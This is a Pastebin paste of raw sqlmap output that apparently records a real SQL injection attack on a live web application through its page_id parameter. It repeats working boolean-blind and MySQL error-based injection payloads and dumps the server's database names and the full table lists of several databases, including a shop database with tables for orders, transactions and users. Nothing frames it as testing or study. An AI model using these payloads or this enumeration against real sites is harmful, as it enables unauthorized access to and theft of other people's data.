Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: Multiplexor on Jan 6th, 2012  |  syntax: SQL  |  size: 34.96 KB  |  views: 1,180  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  #     #                                                                
  2.  ##   ## #    # #      ##### # #####  #      ###### #    #  ####  #####  
  3.  # # # # #    # #        #   # #    # #      #       #  #  #    # #    #
  4.  #  #  # #    # #        #   # #    # #      #####    ##   #    # #    #
  5.  #     # #    # #        #   # #####  #      #        ##   #    # #####  
  6.  #     # #    # #        #   # #      #      #       #  #  #    # #   #  
  7.  #     #  ####  ######   #   # #      ###### ###### #    #  ####  #    #          
  8.  
  9.  
  10.  
  11. sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
  12. ---
  13. Place: GET
  14. Parameter: page_id
  15.     TYPE: boolean-based blind
  16.     Title: AND boolean-based blind - WHERE OR HAVING clause
  17.     Payload: page_id=28167956 AND 1228=1228
  18.  
  19.     TYPE: error-based
  20.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  21.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  22. ---
  23.  
  24. available DATABASES [9]:
  25. [*] information_schema
  26. [*] mysql
  27. [*] orcataco_bumperstic
  28. [*] orcataco_officerjones
  29. [*] orcataco_officerjones_1
  30. [*] orcataco_officerjones_2
  31. [*] orcataco_snap
  32. [*] signedbump
  33. [*] test
  34.  
  35. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  36. ---
  37. Place: GET
  38. Parameter: page_id
  39.     TYPE: boolean-based blind
  40.     Title: AND boolean-based blind - WHERE OR HAVING clause
  41.     Payload: page_id=28167956 AND 1228=1228
  42.  
  43.     TYPE: error-based
  44.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  45.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  46. ---
  47.  
  48. DATABASE: mysql
  49. [17 TABLES]
  50. +---------------------------+
  51. | columns_priv              |
  52. | db                        |
  53. | func                      |
  54. | help_category             |
  55. | help_keyword              |
  56. | help_relation             |
  57. | help_topic                |
  58. | host                      |
  59. | proc                      |
  60. | procs_priv                |
  61. | tables_priv               |
  62. | time_zone                 |
  63. | time_zone_leap_second     |
  64. | time_zone_name            |
  65. | time_zone_transition      |
  66. | time_zone_transition_type |
  67. | USER                      |
  68. +---------------------------+
  69.  
  70. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  71. ---
  72. Place: GET
  73. Parameter: page_id
  74.     TYPE: boolean-based blind
  75.     Title: AND boolean-based blind - WHERE OR HAVING clause
  76.     Payload: page_id=28167956 AND 1228=1228
  77.  
  78.     TYPE: error-based
  79.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  80.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  81. ---
  82.  
  83. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  84. ---
  85. Place: GET
  86. Parameter: page_id
  87.     TYPE: boolean-based blind
  88.     Title: AND boolean-based blind - WHERE OR HAVING clause
  89.     Payload: page_id=28167956 AND 1228=1228
  90.  
  91.     TYPE: error-based
  92.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  93.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  94. ---
  95.  
  96. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  97. ---
  98. Place: GET
  99. Parameter: page_id
  100.     TYPE: boolean-based blind
  101.     Title: AND boolean-based blind - WHERE OR HAVING clause
  102.     Payload: page_id=28167956 AND 1228=1228
  103.  
  104.     TYPE: error-based
  105.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  106.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  107. ---
  108.  
  109. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  110. ---
  111. Place: GET
  112. Parameter: page_id
  113.     TYPE: boolean-based blind
  114.     Title: AND boolean-based blind - WHERE OR HAVING clause
  115.     Payload: page_id=28167956 AND 1228=1228
  116.  
  117.     TYPE: error-based
  118.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  119.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  120. ---
  121.  
  122. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  123. ---
  124. Place: GET
  125. Parameter: page_id
  126.     TYPE: boolean-based blind
  127.     Title: AND boolean-based blind - WHERE OR HAVING clause
  128.     Payload: page_id=28167956 AND 1228=1228
  129.  
  130.     TYPE: error-based
  131.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  132.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  133. ---
  134.  
  135. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  136. ---
  137. Place: GET
  138. Parameter: page_id
  139.     TYPE: boolean-based blind
  140.     Title: AND boolean-based blind - WHERE OR HAVING clause
  141.     Payload: page_id=28167956 AND 1228=1228
  142.  
  143.     TYPE: error-based
  144.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  145.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  146. ---
  147.  
  148. available DATABASES [9]:
  149. [*] information_schema
  150. [*] mysql
  151. [*] orcataco_bumperstic
  152. [*] orcataco_officerjones
  153. [*] orcataco_officerjones_1
  154. [*] orcataco_officerjones_2
  155. [*] orcataco_snap
  156. [*] signedbump
  157. [*] test
  158.  
  159. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  160. ---
  161. Place: GET
  162. Parameter: page_id
  163.     TYPE: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE OR HAVING clause
  165.     Payload: page_id=28167956 AND 1228=1228
  166.  
  167.     TYPE: error-based
  168.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  169.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  170. ---
  171.  
  172. DATABASE: orcataco_bumperstic
  173. [113 TABLES]
  174. +--------------------------+
  175. | _settings                |
  176. | bank                     |
  177. | basket_items             |
  178. | basket_orders            |
  179. | basket_tags              |
  180. | baskets                  |
  181. | brands                   |
  182. | bsuids                   |
  183. | categories               |
  184. | clickemail               |
  185. | clickwizard              |
  186. | comment                  |
  187. | counters                 |
  188. | counters_i12             |
  189. | counters_i24             |
  190. | counters_o12             |
  191. | counters_o24             |
  192. | emailsendlog             |
  193. | favorite_orders          |
  194. | feedback                 |
  195. | game                     |
  196. | game_score               |
  197. | hm_events                |
  198. | hm_message_queue         |
  199. | invited                  |
  200. | invited_from_force       |
  201. | item_book                |
  202. | item_tags                |
  203. | items                    |
  204. | line_items               |
  205. | logadd                   |
  206. | logcontacts              |
  207. | loggiftclick             |
  208. | logimport                |
  209. | loginvite                |
  210. | loginvited               |
  211. | logvalidate              |
  212. | logwizard                |
  213. | motd                     |
  214. | notified                 |
  215. | notify_off               |
  216. | occasions                |
  217. | orders                   |
  218. | orders_non_facebook      |
  219. | page_items               |
  220. | played                   |
  221. | post_install_items       |
  222. | post_install_items_v2    |
  223. | profile_settings         |
  224. | public_pages             |
  225. | publish_stream_sgnonpred |
  226. | purchase                 |
  227. | quicksender              |
  228. | recent_users             |
  229. | reply_from_hist          |
  230. | requests_sent            |
  231. | rpd_by_day               |
  232. | sendqueue                |
  233. | sendsthisweek            |
  234. | sendsthisweek2           |
  235. | sent                     |
  236. | settings                 |
  237. | stream_posts             |
  238. | survey_answers           |
  239. | survey_questions         |
  240. | tag_stats                |
  241. | tags                     |
  242. | temp_birthday_orders     |
  243. | temp_click_events        |
  244. | temp_daily_stats         |
  245. | temp_despicable_me       |
  246. | temp_funnel_test_orders  |
  247. | temp_hourly_stats        |
  248. | temp_invite_stats        |
  249. | temp_invite_stats_v2     |
  250. | temp_item_recs2          |
  251. | temp_nectar_ads          |
  252. | temp_nectar_stats_v2     |
  253. | temp_order_clicks        |
  254. | temp_page_counter        |
  255. | temp_page_visits         |
  256. | temp_premium_orders      |
  257. | temp_request_demo_stats  |
  258. | temp_request_stats       |
  259. | temp_retention_daily     |
  260. | temp_retention_weekly    |
  261. | temp_sendgroup_members   |
  262. | temp_sendgroup_sends     |
  263. | temp_test_order_users    |
  264. | temp_test_orders         |
  265. | temp_tutorial_stages     |
  266. | temp_user_credits        |
  267. | temp_userbase            |
  268. | theme_tag_map            |
  269. | theme_tags               |
  270. | themes                   |
  271. | themes_user_gen          |
  272. | transactions             |
  273. | uids                     |
  274. | unlocked                 |
  275. | unopened                 |
  276. | unsent                   |
  277. | unsubscribe              |
  278. | user_country             |
  279. | user_groups              |
  280. | user_items               |
  281. | user_pages               |
  282. | user_pageviews           |
  283. | user_pageviews_v2        |
  284. | user_themes              |
  285. | userbase                 |
  286. | winner                   |
  287. | wishlist                 |
  288. +--------------------------+
  289.  
  290. DATABASE: test
  291. [21 TABLES]
  292. +------------------------+
  293. | TempTable              |
  294. | appinfo                |
  295. | autoincr               |
  296. | cur                    |
  297. | deals                  |
  298. | errorcounts            |
  299. | errorfromfirst1000     |
  300. | install_metrics        |
  301. | installs_by_day        |
  302. | installs_by_invite_day |
  303. | invited_from_force     |
  304. | invites_by_day         |
  305. | invites_by_newuser_day |
  306. | ret_users2             |
  307. | retlog                 |
  308. | rpdbyda                |
  309. | send_log               |
  310. | uids                   |
  311. | user_country           |
  312. | x                      |
  313. | y                      |
  314. +------------------------+
  315.  
  316. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  317. ---
  318. Place: GET
  319. Parameter: page_id
  320.     TYPE: boolean-based blind
  321.     Title: AND boolean-based blind - WHERE OR HAVING clause
  322.     Payload: page_id=28167956 AND 1228=1228
  323.  
  324.     TYPE: error-based
  325.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  326.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  327. ---
  328.  
  329. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  330. ---
  331. Place: GET
  332. Parameter: page_id
  333.     TYPE: boolean-based blind
  334.     Title: AND boolean-based blind - WHERE OR HAVING clause
  335.     Payload: page_id=28167956 AND 1228=1228
  336.  
  337.     TYPE: error-based
  338.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  339.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  340. ---
  341.  
  342. DATABASE: test
  343. [21 TABLES]
  344. +------------------------+
  345. | TempTable              |
  346. | appinfo                |
  347. | autoincr               |
  348. | cur                    |
  349. | deals                  |
  350. | errorcounts            |
  351. | errorfromfirst1000     |
  352. | install_metrics        |
  353. | installs_by_day        |
  354. | installs_by_invite_day |
  355. | invited_from_force     |
  356. | invites_by_day         |
  357. | invites_by_newuser_day |
  358. | ret_users2             |
  359. | retlog                 |
  360. | rpdbyda                |
  361. | send_log               |
  362. | uids                   |
  363. | user_country           |
  364. | x                      |
  365. | y                      |
  366. +------------------------+
  367.  
  368. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  369. ---
  370. Place: GET
  371. Parameter: page_id
  372.     TYPE: boolean-based blind
  373.     Title: AND boolean-based blind - WHERE OR HAVING clause
  374.     Payload: page_id=28167956 AND 1228=1228
  375.  
  376.     TYPE: error-based
  377.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  378.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  379. ---
  380.  
  381. DATABASE: orcataco_bumperstic
  382. [113 TABLES]
  383. +--------------------------+
  384. | _settings                |
  385. | bank                     |
  386. | basket_items             |
  387. | basket_orders            |
  388. | basket_tags              |
  389. | baskets                  |
  390. | brands                   |
  391. | bsuids                   |
  392. | categories               |
  393. | clickemail               |
  394. | clickwizard              |
  395. | comment                  |
  396. | counters                 |
  397. | counters_i12             |
  398. | counters_i24             |
  399. | counters_o12             |
  400. | counters_o24             |
  401. | emailsendlog             |
  402. | favorite_orders          |
  403. | feedback                 |
  404. | game                     |
  405. | game_score               |
  406. | hm_events                |
  407. | hm_message_queue         |
  408. | invited                  |
  409. | invited_from_force       |
  410. | item_book                |
  411. | item_tags                |
  412. | items                    |
  413. | line_items               |
  414. | logadd                   |
  415. | logcontacts              |
  416. | loggiftclick             |
  417. | logimport                |
  418. | loginvite                |
  419. | loginvited               |
  420. | logvalidate              |
  421. | logwizard                |
  422. | motd                     |
  423. | notified                 |
  424. | notify_off               |
  425. | occasions                |
  426. | orders                   |
  427. | orders_non_facebook      |
  428. | page_items               |
  429. | played                   |
  430. | post_install_items       |
  431. | post_install_items_v2    |
  432. | profile_settings         |
  433. | public_pages             |
  434. | publish_stream_sgnonpred |
  435. | purchase                 |
  436. | quicksender              |
  437. | recent_users             |
  438. | reply_from_hist          |
  439. | requests_sent            |
  440. | rpd_by_day               |
  441. | sendqueue                |
  442. | sendsthisweek            |
  443. | sendsthisweek2           |
  444. | sent                     |
  445. | settings                 |
  446. | stream_posts             |
  447. | survey_answers           |
  448. | survey_questions         |
  449. | tag_stats                |
  450. | tags                     |
  451. | temp_birthday_orders     |
  452. | temp_click_events        |
  453. | temp_daily_stats         |
  454. | temp_despicable_me       |
  455. | temp_funnel_test_orders  |
  456. | temp_hourly_stats        |
  457. | temp_invite_stats        |
  458. | temp_invite_stats_v2     |
  459. | temp_item_recs2          |
  460. | temp_nectar_ads          |
  461. | temp_nectar_stats_v2     |
  462. | temp_order_clicks        |
  463. | temp_page_counter        |
  464. | temp_page_visits         |
  465. | temp_premium_orders      |
  466. | temp_request_demo_stats  |
  467. | temp_request_stats       |
  468. | temp_retention_daily     |
  469. | temp_retention_weekly    |
  470. | temp_sendgroup_members   |
  471. | temp_sendgroup_sends     |
  472. | temp_test_order_users    |
  473. | temp_test_orders         |
  474. | temp_tutorial_stages     |
  475. | temp_user_credits        |
  476. | temp_userbase            |
  477. | theme_tag_map            |
  478. | theme_tags               |
  479. | themes                   |
  480. | themes_user_gen          |
  481. | transactions             |
  482. | uids                     |
  483. | unlocked                 |
  484. | unopened                 |
  485. | unsent                   |
  486. | unsubscribe              |
  487. | user_country             |
  488. | user_groups              |
  489. | user_items               |
  490. | user_pages               |
  491. | user_pageviews           |
  492. | user_pageviews_v2        |
  493. | user_themes              |
  494. | userbase                 |
  495. | winner                   |
  496. | wishlist                 |
  497. +--------------------------+
  498.  
  499. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  500. ---
  501. Place: GET
  502. Parameter: page_id
  503.     TYPE: boolean-based blind
  504.     Title: AND boolean-based blind - WHERE OR HAVING clause
  505.     Payload: page_id=28167956 AND 1228=1228
  506.  
  507.     TYPE: error-based
  508.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  509.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  510. ---
  511.  
  512. DATABASE: orcataco_bumperstic
  513. [113 TABLES]
  514. +--------------------------+
  515. | _settings                |
  516. | bank                     |
  517. | basket_items             |
  518. | basket_orders            |
  519. | basket_tags              |
  520. | baskets                  |
  521. | brands                   |
  522. | bsuids                   |
  523. | categories               |
  524. | clickemail               |
  525. | clickwizard              |
  526. | comment                  |
  527. | counters                 |
  528. | counters_i12             |
  529. | counters_i24             |
  530. | counters_o12             |
  531. | counters_o24             |
  532. | emailsendlog             |
  533. | favorite_orders          |
  534. | feedback                 |
  535. | game                     |
  536. | game_score               |
  537. | hm_events                |
  538. | hm_message_queue         |
  539. | invited                  |
  540. | invited_from_force       |
  541. | item_book                |
  542. | item_tags                |
  543. | items                    |
  544. | line_items               |
  545. | logadd                   |
  546. | logcontacts              |
  547. | loggiftclick             |
  548. | logimport                |
  549. | loginvite                |
  550. | loginvited               |
  551. | logvalidate              |
  552. | logwizard                |
  553. | motd                     |
  554. | notified                 |
  555. | notify_off               |
  556. | occasions                |
  557. | orders                   |
  558. | orders_non_facebook      |
  559. | page_items               |
  560. | played                   |
  561. | post_install_items       |
  562. | post_install_items_v2    |
  563. | profile_settings         |
  564. | public_pages             |
  565. | publish_stream_sgnonpred |
  566. | purchase                 |
  567. | quicksender              |
  568. | recent_users             |
  569. | reply_from_hist          |
  570. | requests_sent            |
  571. | rpd_by_day               |
  572. | sendqueue                |
  573. | sendsthisweek            |
  574. | sendsthisweek2           |
  575. | sent                     |
  576. | settings                 |
  577. | stream_posts             |
  578. | survey_answers           |
  579. | survey_questions         |
  580. | tag_stats                |
  581. | tags                     |
  582. | temp_birthday_orders     |
  583. | temp_click_events        |
  584. | temp_daily_stats         |
  585. | temp_despicable_me       |
  586. | temp_funnel_test_orders  |
  587. | temp_hourly_stats        |
  588. | temp_invite_stats        |
  589. | temp_invite_stats_v2     |
  590. | temp_item_recs2          |
  591. | temp_nectar_ads          |
  592. | temp_nectar_stats_v2     |
  593. | temp_order_clicks        |
  594. | temp_page_counter        |
  595. | temp_page_visits         |
  596. | temp_premium_orders      |
  597. | temp_request_demo_stats  |
  598. | temp_request_stats       |
  599. | temp_retention_daily     |
  600. | temp_retention_weekly    |
  601. | temp_sendgroup_members   |
  602. | temp_sendgroup_sends     |
  603. | temp_test_order_users    |
  604. | temp_test_orders         |
  605. | temp_tutorial_stages     |
  606. | temp_user_credits        |
  607. | temp_userbase            |
  608. | theme_tag_map            |
  609. | theme_tags               |
  610. | themes                   |
  611. | themes_user_gen          |
  612. | transactions             |
  613. | uids                     |
  614. | unlocked                 |
  615. | unopened                 |
  616. | unsent                   |
  617. | unsubscribe              |
  618. | user_country             |
  619. | user_groups              |
  620. | user_items               |
  621. | user_pages               |
  622. | user_pageviews           |
  623. | user_pageviews_v2        |
  624. | user_themes              |
  625. | userbase                 |
  626. | winner                   |
  627. | wishlist                 |
  628. +--------------------------+
  629.  
  630. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  631. ---
  632. Place: GET
  633. Parameter: page_id
  634.     TYPE: boolean-based blind
  635.     Title: AND boolean-based blind - WHERE OR HAVING clause
  636.     Payload: page_id=28167956 AND 1228=1228
  637.  
  638.     TYPE: error-based
  639.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  640.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  641. ---
  642.  
  643. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  644. ---
  645. Place: GET
  646. Parameter: page_id
  647.     TYPE: boolean-based blind
  648.     Title: AND boolean-based blind - WHERE OR HAVING clause
  649.     Payload: page_id=28167956 AND 1228=1228
  650.  
  651.     TYPE: error-based
  652.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  653.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  654. ---
  655.  
  656. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  657. ---
  658. Place: GET
  659. Parameter: page_id
  660.     TYPE: boolean-based blind
  661.     Title: AND boolean-based blind - WHERE OR HAVING clause
  662.     Payload: page_id=28167956 AND 1228=1228
  663.  
  664.     TYPE: error-based
  665.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  666.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  667. ---
  668.  
  669. DATABASE: orcataco_bumperstic
  670. [113 TABLES]
  671. +--------------------------+
  672. | _settings                |
  673. | bank                     |
  674. | basket_items             |
  675. | basket_orders            |
  676. | basket_tags              |
  677. | baskets                  |
  678. | brands                   |
  679. | bsuids                   |
  680. | categories               |
  681. | clickemail               |
  682. | clickwizard              |
  683. | comment                  |
  684. | counters                 |
  685. | counters_i12             |
  686. | counters_i24             |
  687. | counters_o12             |
  688. | counters_o24             |
  689. | emailsendlog             |
  690. | favorite_orders          |
  691. | feedback                 |
  692. | game                     |
  693. | game_score               |
  694. | hm_events                |
  695. | hm_message_queue         |
  696. | invited                  |
  697. | invited_from_force       |
  698. | item_book                |
  699. | item_tags                |
  700. | items                    |
  701. | line_items               |
  702. | logadd                   |
  703. | logcontacts              |
  704. | loggiftclick             |
  705. | logimport                |
  706. | loginvite                |
  707. | loginvited               |
  708. | logvalidate              |
  709. | logwizard                |
  710. | motd                     |
  711. | notified                 |
  712. | notify_off               |
  713. | occasions                |
  714. | orders                   |
  715. | orders_non_facebook      |
  716. | page_items               |
  717. | played                   |
  718. | post_install_items       |
  719. | post_install_items_v2    |
  720. | profile_settings         |
  721. | public_pages             |
  722. | publish_stream_sgnonpred |
  723. | purchase                 |
  724. | quicksender              |
  725. | recent_users             |
  726. | reply_from_hist          |
  727. | requests_sent            |
  728. | rpd_by_day               |
  729. | sendqueue                |
  730. | sendsthisweek            |
  731. | sendsthisweek2           |
  732. | sent                     |
  733. | settings                 |
  734. | stream_posts             |
  735. | survey_answers           |
  736. | survey_questions         |
  737. | tag_stats                |
  738. | tags                     |
  739. | temp_birthday_orders     |
  740. | temp_click_events        |
  741. | temp_daily_stats         |
  742. | temp_despicable_me       |
  743. | temp_funnel_test_orders  |
  744. | temp_hourly_stats        |
  745. | temp_invite_stats        |
  746. | temp_invite_stats_v2     |
  747. | temp_item_recs2          |
  748. | temp_nectar_ads          |
  749. | temp_nectar_stats_v2     |
  750. | temp_order_clicks        |
  751. | temp_page_counter        |
  752. | temp_page_visits         |
  753. | temp_premium_orders      |
  754. | temp_request_demo_stats  |
  755. | temp_request_stats       |
  756. | temp_retention_daily     |
  757. | temp_retention_weekly    |
  758. | temp_sendgroup_members   |
  759. | temp_sendgroup_sends     |
  760. | temp_test_order_users    |
  761. | temp_test_orders         |
  762. | temp_tutorial_stages     |
  763. | temp_user_credits        |
  764. | temp_userbase            |
  765. | theme_tag_map            |
  766. | theme_tags               |
  767. | themes                   |
  768. | themes_user_gen          |
  769. | transactions             |
  770. | uids                     |
  771. | unlocked                 |
  772. | unopened                 |
  773. | unsent                   |
  774. | unsubscribe              |
  775. | user_country             |
  776. | user_groups              |
  777. | user_items               |
  778. | user_pages               |
  779. | user_pageviews           |
  780. | user_pageviews_v2        |
  781. | user_themes              |
  782. | userbase                 |
  783. | winner                   |
  784. | wishlist                 |
  785. +--------------------------+
  786.  
  787. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  788. ---
  789. Place: GET
  790. Parameter: page_id
  791.     TYPE: boolean-based blind
  792.     Title: AND boolean-based blind - WHERE OR HAVING clause
  793.     Payload: page_id=28167956 AND 1228=1228
  794.  
  795.     TYPE: error-based
  796.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  797.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  798. ---
  799.  
  800. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  801. ---
  802. Place: GET
  803. Parameter: page_id
  804.     TYPE: boolean-based blind
  805.     Title: AND boolean-based blind - WHERE OR HAVING clause
  806.     Payload: page_id=28167956 AND 1228=1228
  807.  
  808.     TYPE: error-based
  809.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  810.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  811. ---
  812.  
  813. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  814. ---
  815. Place: GET
  816. Parameter: page_id
  817.     TYPE: boolean-based blind
  818.     Title: AND boolean-based blind - WHERE OR HAVING clause
  819.     Payload: page_id=28167956 AND 1228=1228
  820.  
  821.     TYPE: error-based
  822.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  823.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  824. ---
  825.  
  826. help [1]:
  827.  
  828. wget txt [1]:
  829.  
  830. ? [1]:
  831.  
  832. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  833. ---
  834. Place: GET
  835. Parameter: page_id
  836.     TYPE: boolean-based blind
  837.     Title: AND boolean-based blind - WHERE OR HAVING clause
  838.     Payload: page_id=28167956 AND 1228=1228
  839.  
  840.     TYPE: error-based
  841.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  842.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  843. ---
  844.  
  845. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  846. ---
  847. Place: GET
  848. Parameter: page_id
  849.     TYPE: boolean-based blind
